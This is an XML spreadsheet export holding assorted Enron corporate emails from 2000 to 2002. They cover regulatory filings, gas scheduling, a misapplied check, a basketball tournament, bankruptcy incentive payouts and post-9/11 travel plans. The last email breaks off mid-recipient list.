    <t>frozenset({'nancy.bagot@enron.com', 'stephen.veatch@enron.com', 'teb.lokey@enron.com', 'robert.kilmer@enron.com', 'lon.stanton@enron.com', 'kimberly.watson@enron.com', 'steven.harris@enron.com'})</t>
  </si>
  <si>
    <t>Weekly Report of 1/25/02</t>
  </si>
  <si>
    <t xml:space="preserve">California:_x000D_
_x000D_
CP02-41-000  PG&amp;E Section 7 FERC Proceeding.  On Monday, Jan 28, 2002, Transwestern will file an intervention in the PG&amp;E FERC filing to convert their current intrastate backbone system into an interstate open access pipeline._x000D_
_x000D_
A01-09-024  SoCalGas BCAP.  A Meet and Confer meeting was held on Tuesday to discuss a revised procedural schedule.  Given the ALJ's directive that SoCal must submit a revised BCAP application to reflect the unbundling decision and to include both the LRMC cost methodology and the embedded cost methodology on March 4th, two procedural schedules were submitted to the ALJ for consideration.  SoCal presented a schedule which retains the original Hearing dates to begin on May 21, 2002 and with a final decision by the end of 2002 to allow for implementation of revised rates on Jan. 1, 2003.  The Office of Ratepayer Advocates (ORA) submitted a schedule pushing the hearings back to late August and seeking a Commission decision by the end of March 2003.  The parties were unable to reach a consensus, however more parties objected to the SoCal schedule than the ORA schedule.  An ALJ decision should be forthcoming. _x000D_
_x000D_
Arizona:_x000D_
_x000D_
AZ Legislature.  Due to revenue shortfalls in the current fiscal year, Gov. Hull has announced that  an emergency session beginning Jan. 29, 2002, will need to be called to deal with an estimated $200 million deficit.  On the table for possible cuts are surpluses in special funds such as the tobacco education fund, the Heritage Fund for parks and game preserves and a special lake fund.  Others feel its time to use the remaining "rainy day" fund of $160 Million.  However with a $850 Million deficit expected in 2003, the Gov. wants to keep this fund intact.  </t>
  </si>
  <si>
    <t>Mon, 8 May 2000 04:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Spring Basketball Tournament</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Daren J Farmer/HOU/ECT on 05/08/2000 _x000D_
11:26 AM ---------------------------_x000D_
_x000D_
_x000D_
Jamie Lynn@ENRON_x000D_
05/03/2000 03:53 PM_x000D_
To: Mark Warner/HOU/ECT@ECT, Toby Kuehl/ET&amp;S/Enron@ENRON, Sean _x000D_
Sargent/Corp/Enron@ENRON, Teresa Wright/HR/Corp/Enron@ENRON, Kevin M _x000D_
Presto/HOU/ECT@ECT, Micardo Johns/Corp/Enron@ENRON, Greg _x000D_
Piper/Corp/Enron@Enron, Allan Weatherford/GCO/Enron@ENRON, Brad _x000D_
Morse/HOU/ECT@ECT, Rafael Rizo-Patron/LON/ECT@ECT, Gary W _x000D_
Lamphier/HOU/ECT@ECT, Daren J Farmer/HOU/ECT@ECT, Perron Rogers/HOU/ECT@ECT, _x000D_
Ryan Smith/AA/Corp/Enron@ENRON, Archie N _x000D_
Eubanks/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mike D Smith/HOU/EES@EES, Fred _x000D_
Rhodes/AA/Corp/Enron@ENRON, Chris Barnes/Enron@Gateway, Eric _x000D_
Benson/ET&amp;S/Enron@ENRON, Charles Caine/ECF/Enron@ENRON, Mike _x000D_
Croucher/HOU/ECT@ECT, Clarence Davis/ECF/Enron@ENRON, John _x000D_
Garrett/Corp/Enron@Enron, Willie Haggerty/ECF/Enron@ENRON, Eric J _x000D_
Hardy/HOU/ECT@ECT, Dwight James/HOU/ECT@ECT, Kevin Kuykendall/HOU/ECT@ECT, _x000D_
Richard A Lammers/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John _x000D_
Meeks/ET&amp;S/Enron@ENRON, Richard Orellana/Corp/Enron@ENRON, John _x000D_
Meeks/ET&amp;S/Enron@ENRON, Fimber Phillip/ECF/Enron@ENRON, Ruben _x000D_
Salinas/ECF/Enron@ENRON, John Shupak/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Spring Basketball Tournament_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Jamie Lynn/ET&amp;S/Enron on 05/03/2000 03:33 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Jamie Lynn_x000D_
05/03/2000 02:06 PM_x000D_
To: Oliver Brown/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Martin _x000D_
Rosetta/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Pam _x000D_
Newsome/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Ryan _x000D_
Woods/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mike _x000D_
Layne/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Fred _x000D_
Salinas/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Sean _x000D_
Long/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kevin _x000D_
Ruffcorn/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Keith _x000D_
Sparks/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Aaron _x000D_
Mackey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Braedi Craig/Enron _x000D_
Communications@Enron Communications, Jennifer McClain/Enron _x000D_
Communications@Enron Communications, John Garrett/Corp/Enron@Enron, Darrell _x000D_
Schoolcraft/ET&amp;S/Enron@ENRON, Stanley Horton/Corp/Enron@Enron, Pamela _x000D_
Carter/ET&amp;S/Enron@ENRON, Brandon _x000D_
Whittaker/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Chris Williams/Enron@Gateway, _x000D_
Johnny Mitchell/ET&amp;S/Enron@ENRON, Mike Bryant/OTS/Enron@ENRON, Rick _x000D_
Buy/HOU/ECT@ECT, Bjorn Hagelmann/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, Patrick _x000D_
Hickey/Enron Communications@Enron Communications, Brant Reves/HOU/ECT@ECT, _x000D_
Samantha T Davidson/HOU/ECT@ECT, Tangie Dykes/ET&amp;S/Enron@ENRON, Tara E _x000D_
Turk/HOU/ECT@ECT, Dan Leff/HOU/EES@EES, Mark Pratorius/HOU/EES@EES, Brad _x000D_
Peden/HOU/EES@EES, David Blankenship/Corp/Enron@Enron, Milton _x000D_
Brown/HR/Corp/Enron@ENRON, Ken Reeves/HOU/ECT@ECT, Rory _x000D_
Juneman/Corp/Enron@ENRON, Fred _x000D_
Bridgewater/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Sandy _x000D_
Roberts/Corp/Enron@ENRON, Derek Anderson/HOU/ECT@ECT, David _x000D_
O'Dell/HR/Corp/Enron@ENRON_x000D_
cc:  (bcc: Jamie Lynn/ET&amp;S/Enron)_x000D_
_x000D_
Subject: Spring Basketball Tournament_x000D_
_x000D_
ENRON IS HAVING A BASKETBALL TOURNAMENT ON A MAY 13TH AND YOU ARE INVITED TO _x000D_
PARTICIPATE!_x000D_
_x000D_
On Saturday, May 13th, beginning at 9:00 a.m., The Enron Basketball _x000D_
Association will be sponsoring our Spring 2000 Basketball Tournament for all _x000D_
E.B.A. members. We are planning to limit the size of this tournament to the _x000D_
first eight teams that reply.  While we encourage you to form your own teams, _x000D_
please let us know if you do not have enough players and we will make sure _x000D_
that you are placed on a team.  We will be having a captain's meeting on _x000D_
Tuesday, May 9th, to discuss the rules, prizes, and other details related to _x000D_
the tournament preparation.  Please have a representative from your team come _x000D_
to this meeting prepared with rosters, a team name, and shirt sizes.  Lunch _x000D_
will be provided._x000D_
_x000D_
If you are interested in placing a team in the tournament, or enter as an _x000D_
individual, please contact one of the following by Monday, May 8th._x000D_
_x000D_
                  Jamie Lynn        ext. 3-9515_x000D_
              Rick Dietz           ext. 3-5691_x000D_
                             Steve Kleb          ext. 3-3959_x000D_
_x000D_
If you have any questions, please give any of us a call._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Jul 2001 14:55:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tmckenzie@caiso.com'})</t>
  </si>
  <si>
    <t>frozenset({'marketstatus@caiso.com'})</t>
  </si>
  <si>
    <t>RE: SI is back up</t>
  </si>
  <si>
    <t>Please clear out your Netscape cache and restart your web browser and point_x000D_
to primary SI in Folsom  https://iso_si/iso_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:	McKenzie, Terrance_x000D_
&gt; Sent:	Monday, July 09, 2001 2:53 PM_x000D_
&gt; To:	Market Status_x000D_
&gt; Subject:	SI is back up_x000D_
&gt;_x000D_
&gt; SI is back up in Folsom</t>
  </si>
  <si>
    <t>Fri, 5 Oct 2001 09:08:55 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michele.winckowski@enron.com', 'e..anderson@enron.com'})</t>
  </si>
  <si>
    <t>RE: End-user Agreement Processes</t>
  </si>
  <si>
    <t xml:space="preserve">	I would like to recap my understanding and the "To Do's" from the meeting yesterday.  _x000D_
_x000D_
		1.  After November 1, Measurement would NO longer adjust any TBS physical_x000D_
	                 volumes unless there was a PPA directly influencing said TBS._x000D_
_x000D_
		2.  Measurement would check  to see if they had a deduct meter they were_x000D_
	                 using in the end user process. (Since the meeting we have discovered that_x000D_
	 	     the deduct meter IS in GVA, therefore no checking needs to be done)._x000D_
_x000D_
		3.  Gas Logistics would check with IT on possible enhancement (if necessary) for_x000D_
		     negative volumes to the TBS.  (We have talked with IT and this would be_x000D_
		     a major enhancement and have to be done with the new system)._x000D_
_x000D_
		4.  Procedures need to be documented to handle negative numbers created by_x000D_
		     the LDC giving measurement an end user actual volume greater than the _x000D_
		     TBS connected to NNG._x000D_
_x000D_
		5.  Measurement and Gas Logistics agreed that all measured volumes including_x000D_
		     End User point volumes would be "housed' in PGAS._x000D_
_x000D_
	After further discussions in Gas Logistics, our recommendation is that neither Measurement or Gas Logistics accomodate a_x000D_
	negative number.  If the LDC gives measurement an end user volume greater than the TBS the following should happen:_x000D_
_x000D_
		1.  Measurement should either:_x000D_
_x000D_
			a.  Call the LDC and let them know they cannot accept a volume at an end_x000D_
			     user point higher than their TBS._x000D_
_x000D_
			b.  Or Measurement can call Jodie Floyd on the Gas Logistics Measurement Desk_x000D_
			     and Jodie will call LDC with the same info._x000D_
_x000D_
		2.  If Measurement does not get an answer before measurement close, then measurement will_x000D_
		     use the number equal to the TBS for the end user point._x000D_
_x000D_
	Gary and Ellis, you may want to have more discussions on this topic.  I would be glad to regroup if you want._x000D_
	I have put a call into Marketing to talk to them about our concerns on this issue.  Also Raetta and Jodie are_x000D_
	 going to go ahead and call Wisconsin Gas and get their explanation of why an end user point would be_x000D_
	greater than the TBS.  Hopefully it is just a measurement error.  We will let you know the outcome._x000D_
_x000D_
	If there is something I missed, please let me know.  Thanks. Lynn_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Winckowski, Michele  _x000D_
Sent:	Friday, October 05, 2001 10:09 AM_x000D_
To:	Blair, Lynn; Anderson, Gary E._x000D_
Cc:	Dornan, Dari_x000D_
Subject:	End-user Agreement Processes_x000D_
_x000D_
	Just wanted to follow-up.  Are we still O.K. with the decisions made in the meeting the other day regarding the handling of end-user transactions?  Have we run into any additional obstacles?  Do you need me to do anything to assist in the process?  If something does change, would you please let me know.  Thanks MW</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 08:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Roll of Lehman Forwards</t>
  </si>
  <si>
    <t>Steve-_x000D_
_x000D_
On 3/30/01 we rolled the 2 forwards maturing on 3/31 to 4/30._x000D_
On 4/2/01 we amended the forwards so that they now mature on 6/29/01._x000D_
Also, we entered into 3 puts maturing on 6/28/01._x000D_
_x000D_
Lehman is sending me a spreadsheet with the details, and Lehman Brothers in _x000D_
Geneva should send us the confirms shortly._x000D_
_x000D_
Jeff Nogid_x000D_
Enron Global Finance_x000D_
713-853-4782</t>
  </si>
  <si>
    <t>Fri, 11 Jan 2002 14:37:15 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'amy.baker@enron.com'})</t>
  </si>
  <si>
    <t>RE: Help, please</t>
  </si>
  <si>
    <t>You bet!_x000D_
Have a great week-end!_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Watson, Kimberly  _x000D_
Sent:	Friday, January 11, 2002 4:37 PM_x000D_
To:	Baker, Amy_x000D_
Subject:	RE: Help, please_x000D_
_x000D_
Thank you, Amy for checking this out for us.  _x000D_
_x000D_
Have a great weekend._x000D_
_x000D_
Kim._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Baker, Amy  _x000D_
Sent:	Friday, January 11, 2002 1:36 PM_x000D_
To:	Watson, Kimberly_x000D_
Cc:	Brassfield, Morris; Sosa, Frank; Geaccone, Tracy_x000D_
Subject:	RE: Help, please_x000D_
_x000D_
_x000D_
When this invoice was input, it was paid to Lea County Courthouse (5000042878) instead of Leaco Rural Telephone (5000019852).  I have a call into Micah to explain the situation and have her return the check.  Who takes care of voiding checks in Houston?  Please let me know, and I'll have her send it in._x000D_
_x000D_
Thanks_x000D_
Amy    _x000D_
_x000D_
 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; _x000D_
_x000D_
 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; _x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Brassfield, Morris  _x000D_
Sent:	Friday, January 11, 2002 12:00 PM_x000D_
To:	Sosa, Frank_x000D_
Cc:	Baker, Amy_x000D_
Subject:	FW: Help, please_x000D_
_x000D_
Could you follow up on this?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Geaccone, Tracy  _x000D_
Sent:	Friday, January 11, 2002 11:49 AM_x000D_
To:	Brassfield, Morris_x000D_
Cc:	Watson, Kimberly_x000D_
Subject:	FW: Help, please_x000D_
_x000D_
can you take care of this?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Watson, Kimberly  _x000D_
Sent:	Friday, January 11, 2002 11:39 AM_x000D_
To:	Geaccone, Tracy_x000D_
Subject:	Help, please_x000D_
_x000D_
Tracey,_x000D_
_x000D_
I received a phone call yesterday from  Mika Aswell (spelling?) from Lea County, NM.  Her county office has received a check from Transwestern and she does not know how to apply it.  Here is what we know:_x000D_
_x000D_
	Amount:	$7.36_x000D_
	Check Date:  	December 17, 2001_x000D_
	Invoice Date:	1-1-2001	#676-3004-0_x000D_
	Voucher:	0100001479_x000D_
	Purchase Order:	A60KD13882_x000D_
_x000D_
Mika's phone number is (505)396-8534._x000D_
_x000D_
Can you please track this down and tell me or Mika how to apply this money._x000D_
_x000D_
Many thanks, _x000D_
Kim X33098</t>
  </si>
  <si>
    <t>Fri, 24 May 2002 12:26:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: LIP Update</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Etienne, Bernadette  _x000D_
Sent:	Friday, May 24, 2002 2:12 PM_x000D_
Cc:	Funkhouser, Shanna; Jones, Robert W.- HR Exec; Wright, Teresa_x000D_
Subject:	LIP Update_x000D_
Importance:	High_x000D_
_x000D_
This message is being sent on behalf of Robert Jones_x000D_
_x000D_
To:  All Liquidation Incentive Program Participants_x000D_
From:  Human Resources_x000D_
Re:  First Collection Milestone Achieved_x000D_
_x000D_
Several weeks ago, we told you we believed we had hit our first cash collection milestone, and indeed we have.  Representatives for the unsecured creditors' committee and the ENA examiner are currently validating our cash collections and we expect them to verify the milestone very soon.  The bankruptcy court judge has also signed the official motion related to the retention and LIP plans, so it is final with no additional follow-up with the court required.  Soon, all the pieces will be in place to make our first Liquidation Incentive Pool dispersement.  Because it will be our first dispersement, we are taking the needed time to establish an accurate and equitable process for this and future payouts.  We plan to hold a meeting with all LIP participants in the next week or two to walk through the procedures we've developed and answer any questions.  We'll be in contact with you soon to schedule that meeting.  _x000D_
_x000D_
Thank you,_x000D_
Robert Jones</t>
  </si>
  <si>
    <t>Thu, 7 Mar 2002 03:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sunitha.kongara@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'patricia.hunter@enron.com', 'mark.fisher@enron.com', 'rabi.sahoo@enron.com'})</t>
  </si>
  <si>
    <t>MINANA FILES OF DEC 2001 FOR FENNER</t>
  </si>
  <si>
    <t xml:space="preserve">MINANA files of dec 2001 for FENNER has been loaded.Total number of records _x000D_
are 29739._x000D_
However there exist large gap in the data,this is due to the turbines are  _x000D_
not containing full months data.For example some turbines are having from _x000D_
10th dec were other have from 12th dec or 22th dec.Please look at the data _x000D_
and let me know if any problems are there._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 14 Oct 2001 15:38:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 10/14/01; HourAhead hour: 18;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Start Date: 10/14/01; HourAhead hour: 18;  No ancillary schedules awarded.  Variances detected._x000D_
Variances detected in Generation schedule. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2001101418.txt_x000D_
_x000D_
Error retrieving HourAhead price data - process continuing..._x000D_
---- Generation Schedule ----_x000D_
$$$ Variance found in table tblGEN_SCHEDULE._x000D_
     Details: (Hour: 18 / Preferred:   0.01 / Final:   0.00)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: SierraPowe_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 10/14/01_x000D_
  UNIT_ID: VESTAL_6_WDFIRE_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 Aug 2000 09:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Final CP Name Change/Merger List 08/00</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the final list for name changes and mergers for August 2000._x000D_
_x000D_
The name change overlays were done on the dates indicated._x000D_
_x000D_
The ERMS short names will be changed TOMORROW, August 23, in the afternoon.  _x000D_
If there are any objections please contact me or Bill Hare at  X3-9249._x000D_
_x000D_
Record inactivations will be done on the afternoon of Sept, 1._x000D_
_x000D_
_x000D_
Please call Cheryl for questions or comments X3-3103_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2000 03:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: East &amp; Upstream Origination/Gas Trading - QLR Scheduled for_x000D_
 11/8/00</t>
  </si>
  <si>
    <t xml:space="preserve">Steve:_x000D_
_x000D_
Would it be possible for you to participate by phone?_x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Steve Van Hooser_x000D_
	10/31/2000 10:35 AM_x000D_
		 _x000D_
		 To: Barbara Gray, Jeffrey T Hodge/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: East &amp; Upstream Origination/Gas Trading - QLR Scheduled for 11/8/00_x000D_
_x000D_
There will be a Rockhouse (LINED ROCK CAVERN) meeting on  November 20 &amp; 21in _x000D_
New York City.   I would appreciate your feedback on whether I should ask _x000D_
Janette to try and find another time._x000D_
_x000D_
Steve_x000D_
----- Forwarded by Steve Van Hooser/HOU/ECT on 10/31/2000 10:32 AM -----_x000D_
_x000D_
	Janette Elbertson_x000D_
	10/31/2000 09:58 AM_x000D_
		 _x000D_
		 To: Barbara N Gray/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, Shonnie _x000D_
Daniel/HOU/ECT@ECT, Steve Van Hooser/HOU/ECT@ECT, Stuart Zisman/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: East &amp; Upstream Origination/Gas Trading - QLR Scheduled for 11/8/00_x000D_
_x000D_
The Quarterly Legal Review for East &amp; Upstream Origination/Gas needs to be _x000D_
rescheduled to another day and time.  Please let me know if Tuesday, November _x000D_
21, from 2:00 to 4:00 p.m. works with your calendars.  Many thanks.  _x000D_
_x000D_
_x000D_
Janette Elbertson_x000D_
Enron North America Corp._x000D_
Legal Department - EB3326_x000D_
Telephone:  (713) 853-7906_x000D_
Fax:  (713) 646-2600_x000D_
janette.elbertson@enron.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 Jan 2001 05:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeff.north@dynegy.com', 'monica.roberts@enron.com'})</t>
  </si>
  <si>
    <t>Re: Downstream Contracts at Toledo</t>
  </si>
  <si>
    <t xml:space="preserve">Back to 17,686 at Toledo for 1/6_x000D_
---------------------- Forwarded by Jeffrey Porter/HOU/EES on 01/05/2001 _x000D_
01:23 PM ---------------------------_x000D_
_x000D_
01/04/2001 11:06 AM_x000D_
Jeffrey Porter_x000D_
Jeffrey Porter_x000D_
Jeffrey Porter_x000D_
01/04/2001 11:06 AM_x000D_
01/04/2001 11:06 AM_x000D_
To: jeno@dynegy.com_x000D_
cc:  _x000D_
Subject: Re: Downstream Contracts at Toledo_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Jeffrey Porter/HOU/EES on 01/04/2001 _x000D_
11:05 AM ---------------------------_x000D_
_x000D_
01/04/2001 09:43 AM_x000D_
Jeffrey Porter_x000D_
Jeffrey Porter_x000D_
Jeffrey Porter_x000D_
01/04/2001 09:43 AM_x000D_
01/04/2001 09:43 AM_x000D_
To: Monica Roberts/HOU/EES@EES_x000D_
cc: Timothy L Ray/HOU/EES@EES _x000D_
Subject: Re: Downstream Contracts at Toledo_x000D_
  _x000D_
_x000D_
New Noms for 1/5 at ANR/TCO Monclova. K#103722_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Monica Roberts_x000D_
_x000D_
01/04/2001 09:09 AM_x000D_
_x000D_
To: Jeffrey Porter/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Re: Downstream Contracts at Toledo_x000D_
  _x000D_
_x000D_
Jeff, the Dynegy scheduler is Jeff North.  His phone number is 713/507-6474.  _x000D_
His pager is 713/616-1280.  I have left him a voicemail and just paged him, _x000D_
so as soon as I talk with him, I'm going to ask him to call you.  Hopefully _x000D_
with you guys talking directly, you can figure out why the gas isn't _x000D_
flowing.  Please keep me posted as to what I can do to help._x000D_
_x000D_
Monica_x000D_
x57048_x000D_
_x000D_
_x000D_
_x000D_
12/28/2000 04:05 PM_x000D_
Jeffrey Porter_x000D_
Jeffrey Porter_x000D_
Jeffrey Porter_x000D_
12/28/2000 04:05 PM_x000D_
12/28/2000 04:05 PM_x000D_
To: Monica Roberts/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Downstream Contracts at Toledo_x000D_
_x000D_
_x000D_
Here are the downstream contracts for NPC's purchase at TCO Toledo for Jan01. _x000D_
Please let me know your upstreams._x000D_
Thanks, JPP x5-3507_x000D_
_x000D_
_x000D_
_x000D_
Toledo	_x000D_
RP Volume	K#_x000D_
7,156 	68918_x000D_
2,454 	68915_x000D_
511 	69148_x000D_
1,636 	69693_x000D_
87 	68917_x000D_
1,022 	69149_x000D_
1,958 	68916_x000D_
818 	66961_x000D_
2,045 	66944_x000D_
17,686 	_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Sep 2001 06:57:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'terrie.james@enron.com'})</t>
  </si>
  <si>
    <t>RE: Just Checking In</t>
  </si>
  <si>
    <t xml:space="preserve">I think you are right:  most people will elect to travel by car, alone or in groups.  I doubt that a bus will make sense._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	James, Terrie  _x000D_
Sent:	Wednesday, September 19, 2001 5:24 PM_x000D_
To:	Kean, Steven J.; Olson, Cindy_x000D_
Subject:	FW: Just Checking In_x000D_
_x000D_
Just wanted to pass this along.  It's good to know he is alright._x000D_
_x000D_
With someone like Mr. Foster so nervous about air travel, do we need to consider alternative travel options for our VPs?  I'm assuming a lot more will chose to drive from Houston to San Antonio -- I know I will this year.  The idea of chartered buses from Houston to San Antonio surfaced, but I expect most who opt to drive will want control of the time they leave and return to Houston and arrange a small carpool.  What are your thoughts?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dick_Foster@mckinsey.com@ENRON COMMUNICATIONS [mailto:IMCEANOTES-Dick+5FFoster+40mckinsey+2Ecom+40ENRON+20COMMUNICATIONS@ENRON.com] _x000D_
Sent:	Wednesday, September 19, 2001 1:48 PM_x000D_
To:	James, Terrie_x000D_
Cc:	heidi_smith@mckinsey.com_x000D_
Subject:	Re: Just Checking In_x000D_
_x000D_
 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; _x000D_
_x000D_
Terrie, a warm thx to you.  We are, thank God, all OK here, both family and_x000D_
friends.  Friends of friends were badly hit however, and that hurts all of_x000D_
us.  NYC is a different place today than a little more than a week ago._x000D_
_x000D_
As long as you are sending the plane I am coming.  Frankly, without the_x000D_
plane it would be a tough decision to make.  I find that most meetings_x000D_
requiring travel these days are getting canceled.  It is one thing for an_x000D_
individual to fly, it is another thing for an a father or mother to leave_x000D_
spouse and children at home.   That is very hard to justify at this point._x000D_
_x000D_
Thanks for your concern and kindness._x000D_
_x000D_
Dick_x000D_
_x000D_
_x000D_
_x000D_
                     "James,_x000D_
                     Terrie"              To:     &lt;dick_foster@mckinsey.com&gt;_x000D_
                     &lt;Terrie.James        cc:     &lt;heidi_smith@mckinsey.com&gt;_x000D_
                     @ENRON.com&gt;          Subject:     Just Checking In_x000D_
                     09/18/2001_x000D_
                     11:27 AM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dick (and Heidi),_x000D_
_x000D_
I wanted to check in and make sure you were okay after last week's_x000D_
tragic events in NYC.  As we move forward with plans for our Management_x000D_
Conference, let's discuss arrangements for you.  Given the uncertainty_x000D_
of air travel, we are extending use of our corporate jets to our_x000D_
speakers._x000D_
_x000D_
Hoping you are well,_x000D_
Terrie James_x000D_
Senior Director, Public Relations_x000D_
Enron Broadband Services_x000D_
(ph) 713.853.7727_x000D_
(fax) 713.646.3248_x000D_
terrie.james@enron.com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 This message may contain confidential and/or privileged     |_x000D_
| information.  If you are not the addressee or authorized to |_x000D_
| receive this for the addressee, you must not use, copy,     |_x000D_
| disclose or take any action based on this message or any    |_x000D_
| information herein.  If you have received this message in   |_x000D_
| error, please advise the sender immediately by reply e-mail |_x000D_
| and delete this message.  Thank you for your cooperation.   |_x000D_
+-------------------------------------------------------------+_x000D_
_x000D_
 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt;  - att1.eml &lt;&lt; File: att1.eml &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 14:03:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>yes_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Riordan, Sean  _x000D_
Sent:	Monday, April 30, 2001 4:01 PM_x000D_
To:	Scott, Susan M._x000D_
Subject:	RE: _x000D_
_x000D_
Susan,_x000D_
Can you still stop by before you leave today pls?_x000D_
_x000D_
_x000D_
Thanks,_x000D_
SPR_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Scott, Susan M.  _x000D_
Sent:	Monday, April 30, 2001 9:05 AM_x000D_
To:	""Riordan, Sean" &lt;sean.riordan@ENRON.com&gt;@ENRON" &lt;IMCEANOTES-+22Riordan+2C+20Sean+22+20+3Csean+2Eriordan+40ENRON+2Ecom+3E+40ENRON@ENRON.com&gt;@SMTP@enronXgate_x000D_
Subject:	RE:  _x000D_
_x000D_
Sure....I probably won't be able to come by until after lunch though._x000D_
_x000D_
Susan_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Riordan, Sean" &lt;sean.riordan@ENRON.com&gt;@ENRON [mailto:IMCEANOTES-+22Riordan+2C+20Sean+22+20+3Csean+2Eriordan+40ENRON+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Monday, April 30, 2001 8:50 AM_x000D_
To:	sscott5@enron.com_x000D_
Subject:	 _x000D_
_x000D_
_x000D_
_x000D_
Susan,_x000D_
_x000D_
If you have time at some point today could you stop by my desk. We had_x000D_
some problems running that GDOPT &amp; SwapAvg Report file last week._x000D_
_x000D_
_x000D_
Cheers,_x000D_
_x000D_
SPR</t>
  </si>
  <si>
    <t>Wed, 31 May 2000 03:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Camp Enron Information</t>
  </si>
  <si>
    <t xml:space="preserve">Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 05/31/2000 10:31 AM -----_x000D_
_x000D_
	Carol St Clair_x000D_
	05/31/2000 10:31 AM_x000D_
		 _x000D_
		 To: Helge-J_rgen Beil/FRA/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Camp Enron Information_x000D_
_x000D_
Bill:_x000D_
Could you please fax Arthur's immunization records to the number below?  _x000D_
Thanks._x000D_
carol_x000D_
_x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 05/31/2000 10:30 AM -----_x000D_
_x000D_
	Michelle Kapfer@ENRON_x000D_
	05/31/2000 09:42 AM_x000D_
		 _x000D_
		 To: Gilda Bartz/GPGFIN/Enron@ENRON, Tamara Jae Black/HOU/ECT@ECT, Paul _x000D_
Bieniawski/Corp/Enron@ENRON, Janie _x000D_
Bonnard/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kelly H Boots/HOU/ECT@ECT, _x000D_
Felicia Buenrostro/HR/Corp/Enron@ENRON, Pam Butler/HR/Corp/Enron@ENRON, _x000D_
